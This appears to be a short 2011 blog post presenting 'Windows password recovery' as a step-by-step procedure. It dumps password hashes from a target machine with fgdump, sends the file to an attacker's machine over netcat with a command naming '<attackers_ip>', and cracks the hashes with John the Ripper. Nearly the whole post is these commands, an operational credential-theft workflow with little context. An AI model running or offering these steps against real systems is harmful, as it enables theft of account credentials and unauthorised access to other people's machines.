Friday, March 11, 2011

Basics of Windows password recovery

In this post I outline basics steps for successful Windows password recovery.
Tools used: fgdump, john the ripper

On target machine as Administrator:

C:\> fgdump.exe -c        # dumps passwords from local windows box to 127.0.0.1.pwdump file

we use netcat to send dumped hashes to attacker's machine, attacker's machine:

$ nc -l -p 2222 > sam.txt

target machine:

C:\> nc <attackers_ip> 2222 < 127.0.0.1.pwdump

On attacker's machine:

$ ./john --session=recovery1 127.0.0.1.pwdump

We can stop guessing session with ^C and restore it with:

$ ./john --session=recovery1

Spacebar shows us speed of recovery. Recoverd passwords are in john.pot file, to save them in a file:

$ john --show 127.0.0.1.pwdump > 127.0.0.1.cracked.txt

It's basic use scenario of recovering passwords. There's more about john (modes of operation, distributing computation among several machines, optimizing key space). More on it in future.